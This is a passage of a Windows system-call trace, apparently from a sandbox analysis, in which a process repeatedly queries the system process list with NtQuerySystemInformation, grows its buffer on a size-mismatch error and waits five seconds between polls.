ResultLength=0x0) returned 0xc0000004 [0256.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.745] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.759] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.766] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.773] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.787] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.827] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.857] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.886] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.894] NtAllocateVirtualMemory (in: 